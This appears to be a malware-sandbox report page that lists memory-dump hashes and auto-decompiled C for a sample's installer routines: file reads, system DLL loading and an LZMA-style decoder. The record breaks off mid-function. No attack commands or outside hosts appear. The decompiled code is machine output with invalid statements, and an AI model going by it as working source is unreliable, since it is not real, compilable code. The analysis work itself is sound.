                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                  • String ID: ExecToStack
                                                                                                                                                                                                  • API String ID: 1941528284-166031814
                                                                                                                                                                                                  • Opcode ID: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                  • Instruction ID: ededab686cc318fc7e7b90f4c09e4a826d398c1608d56966c744d50d12e1e378
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4841B571900518BADF107BA5CD85DAF3679EF4532DB20423FF416B10E2DB3C8A929A6D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 004032DE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 474 4032de-403306 GetTickCount 475 403436-40343e call 402e8e 474->475 476 40330c-403337 call 40345d SetFilePointer 474->476 481 403440-403444 475->481 482 40333c-40334e 476->482 483 403350 482->483 484 403352-403360 call 403447 482->484 483->484 487 403366-403372 484->487 488 403428-40342b 484->488 489 403378-40337e 487->489 488->481 490 403380-403386 489->490 491 4033a9-4033c5 call 406943 489->491 490->491 492 403388-4033a8 call 402e8e 490->492 497 403431 491->497 498 4033c7-4033cf 491->498 492->491 499 403433-403434 497->499 500 4033d1-4033d9 call 405f90 498->500 501 4033f2-4033f8 498->501 499->481 504 4033de-4033e0 500->504 501->497 503 4033fa-4033fc 501->503 503->497 505 4033fe-403411 503->505 506 4033e2-4033ee 504->506 507 40342d-40342f 504->507 505->482 508 403417-403426 SetFilePointer 505->508 506->489 509 4033f0 506->509 507->499 508->475 509->505
                                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                                  			E004032DE(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x42a6d4; // 0x710ec2
				_t34 = _t32 -  *0x41e640 + _a4;
				 *0x470250 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E8E(1);
					return 0;
				}
				E0040345D( *0x42a6e4);
				SetFilePointer( *0x40a01c,  *0x41e640, 0, 0); // executed
				 *0x42a6e0 = _t34;
				 *0x42a6d0 = 0;
				while(1) {
					_t10 =  *0x42a6d8; // 0x6c7c83
					_t31 = 0x4000;
					_t11 = _t10 -  *0x42a6e4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403447(0x4266d0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x42a6e4 =  *0x42a6e4 + _t31;
					 *0x41e660 = 0x4266d0;
					 *0x41e664 = _t31;
					L6:
					L6:
					if( *0x470254 != 0 &&  *0x470300 == 0) {
						_t19 =  *0x42a6e0; // 0x2581b
						 *0x42a6d0 = _t19 -  *0x42a6d4 - _a4 +  *0x41e640;
						E00402E8E(0);
					}
					 *0x41e668 = 0x41e6d0;
					 *0x41e66c = 0x8000; // executed
					_t14 = E00406943(0x41e648); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x41e668; // 0x420b66
					_t37 = _t36 - 0x41e6d0;
					if(_t37 == 0) {
						__eflags =  *0x41e664; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x42a6d4; // 0x710ec2
						if(_t16 -  *0x41e640 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405F90( *0x40a01c, 0x41e6d0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x41e640 =  *0x41e640 + _t37;
					_t49 =  *0x41e664; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                                                                                                                                                  0x004032e1
                                                                                                                                                                                                  0x004032ee
                                                                                                                                                                                                  0x00403301
                                                                                                                                                                                                  0x00403306
                                                                                                                                                                                                  0x00403436
                                                                                                                                                                                                  0x00403438
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040343e
                                                                                                                                                                                                  0x00403312
                                                                                                                                                                                                  0x00403325
                                                                                                                                                                                                  0x0040332b
                                                                                                                                                                                                  0x00403331
                                                                                                                                                                                                  0x0040333c
                                                                                                                                                                                                  0x0040333c
                                                                                                                                                                                                  0x00403341
                                                                                                                                                                                                  0x00403346
                                                                                                                                                                                                  0x0040334e
                                                                                                                                                                                                  0x00403350
                                                                                                                                                                                                  0x00403350
                                                                                                                                                                                                  0x00403359
                                                                                                                                                                                                  0x00403360
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403366
                                                                                                                                                                                                  0x0040336c
                                                                                                                                                                                                  0x00403372
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403378
                                                                                                                                                                                                  0x0040337e
                                                                                                                                                                                                  0x00403388
                                                                                                                                                                                                  0x0040339e
                                                                                                                                                                                                  0x004033a3
                                                                                                                                                                                                  0x004033a8
                                                                                                                                                                                                  0x004033ae
                                                                                                                                                                                                  0x004033b4
                                                                                                                                                                                                  0x004033be
                                                                                                                                                                                                  0x004033c5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004033c7
                                                                                                                                                                                                  0x004033cd
                                                                                                                                                                                                  0x004033cf
                                                                                                                                                                                                  0x004033f2
                                                                                                                                                                                                  0x004033f8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004033fa
                                                                                                                                                                                                  0x004033fc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004033fe
                                                                                                                                                                                                  0x004033fe
                                                                                                                                                                                                  0x00403411
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403420
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403420
                                                                                                                                                                                                  0x004033d9
                                                                                                                                                                                                  0x004033e0
                                                                                                                                                                                                  0x0040342d
                                                                                                                                                                                                  0x00403433
                                                                                                                                                                                                  0x00403433
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403433
                                                                                                                                                                                                  0x004033e2
                                                                                                                                                                                                  0x004033e8
                                                                                                                                                                                                  0x004033ee
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403431
                                                                                                                                                                                                  0x00403431
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403431
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                                    • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00710EC2,00000000,00000000,dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;, xrefs: 00403352, 00403358
                                                                                                                                                                                                  • rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1, xrefs: 00403337, 004033D2
                                                                                                                                                                                                  • HA, xrefs: 004033A9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FilePointer$CountTick
                                                                                                                                                                                                  • String ID: HA$dlers:o,mutableDefaults:Boolean(y)})};const L=async function*(P,g){let o=_(P,g,v.options);o.resolveBodyOnly=!1;const y=o.pagination;if(!s.default.object(y))throw new TypeError("`options.pagination` must be implemented");const R=[];let{countLimit:C}=y,F=0;for(;$rects:10,prefixUrl:"",methodRewriting:!0,ignoreInvalidCookies:!1,context:{},http2:!1,allowGetBody:!1,https:void 0,pagination:{transform:u=>u.request.options.responseType==="json"?u.body:JSON.parse(u.body),paginate:u=>{if(!Reflect.has(u.headers,"link"))return!1
                                                                                                                                                                                                  • API String ID: 1092082344-1933180147
                                                                                                                                                                                                  • Opcode ID: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                  • Instruction ID: fd4332e341476289c3f76e81f79fa789cc737db0b0adfb813ccc5192894bdc6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C231B171600211DBC7209F26FE8496A3BA8F7643567C9423BEC40B62E0CB385D11DB1E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 510 406752-406772 GetSystemDirectoryW 511 406774 510->511 512 406776-406778 510->512 511->512 513 406789-40678b 512->513 514 40677a-406783 512->514 516 40678c-4067bf wsprintfW LoadLibraryExW 513->516 514->513 515 406785-406787 514->515 515->516
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E00406752(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                                                                                                  0x00406769
                                                                                                                                                                                                  0x00406772
                                                                                                                                                                                                  0x00406774
                                                                                                                                                                                                  0x00406774
                                                                                                                                                                                                  0x00406778
                                                                                                                                                                                                  0x0040678b
                                                                                                                                                                                                  0x00406785
                                                                                                                                                                                                  0x00406785
                                                                                                                                                                                                  0x00406785
                                                                                                                                                                                                  0x004067a4
                                                                                                                                                                                                  0x004067b8
                                                                                                                                                                                                  0x004067bf

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                                                                                  • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                  • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406943 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 198COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 517 406943-406966 518 406970-406973 517->518 519 406968-40696b 517->519 521 406976-40697f 518->521 520 407390-407394 519->520 522 406985 521->522 523 40738d 521->523 524 406a31-406a35 522->524 525 406aa1-406aa5 522->525 526 40698c-406990 522->526 527 406acc-407173 522->527 523->520 528 4072e1-4072eb 524->528 529 406a3b-406a54 524->529 532 4072f0-4072fa 525->532 533 406aab-406abf 525->533 530 406996-4069a3 526->530 531 407378-40738b 526->531 538 407175-40718b 527->538 539 40718d-4071a3 527->539 528->531 535 406a57-406a5b 529->535 530->523 536 4069a9-4069ef 530->536 531->520 532->531 537 406ac2-406aca 533->537 535->524 541 406a5d-406a63 535->541 542 4069f1-4069f5 536->542 543 406a17-406a19 536->543 537->525 537->527 540 4071a6-4071ad 538->540 539->540 544 4071d4-4071e0 540->544 545 4071af-4071b3 540->545 546 406a65-406a6c 541->546 547 406a8d-406a9f 541->547 548 406a00-406a0e GlobalAlloc 542->548 549 4069f7-4069fa GlobalFree 542->549 550 406a27-406a2f 543->550 551 406a1b-406a25 543->551 544->521 552 407362-40736c 545->552 553 4071b9-4071d1 545->553 555 406a77-406a87 GlobalAlloc 546->555 556 406a6e-406a71 GlobalFree 546->556 547->537 548->523 557 406a14 548->557 549->548 550->535 551->550 551->551 552->531 553->544 555->523 555->547 556->555 557->543
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00406943(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407395))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
